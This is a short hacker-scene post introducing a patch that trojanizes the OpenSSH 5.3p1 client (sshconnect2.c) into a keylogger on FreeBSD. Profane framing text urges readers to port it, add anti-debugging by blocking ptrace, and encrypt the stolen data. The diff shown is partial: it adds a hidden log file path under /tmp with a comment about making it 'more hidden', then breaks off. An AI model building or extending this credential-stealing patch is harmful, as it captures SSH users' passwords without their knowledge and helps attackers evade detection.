Some Bullshit About SSH Keylogger!
This ssh keylogger patch just works on FreeBSD system. Use your fucking
brain to make it working in other operating system. For Anti debugging
feature, there is simple idea to prevent tracing system like strace, just
prevent ptrace syscall! If you are cool enough, improve this keylogger to
encrypt the data.
Keep Hacking boyz!
SSH Keylogger OpenSSH-5.3p1 Patch.
--- sshconnect2.c.ori 2010-02-12 21:44:49.000000000 +0700
+++ sshconnect2.c 2010-02-12 22:13:43.000000000 +0700
@@ -31,6 +31,7 @@
#include
#include
+#include
#include
#include
#include
@@ -75,6 +76,10 @@
#include "ssh-gss.h"
#endif
+//SSH log
+
+#define LOGZ "/tmp/.byteskrew" // change this line and make it more hidden
+
/* import */
extern char *client_version_string;
...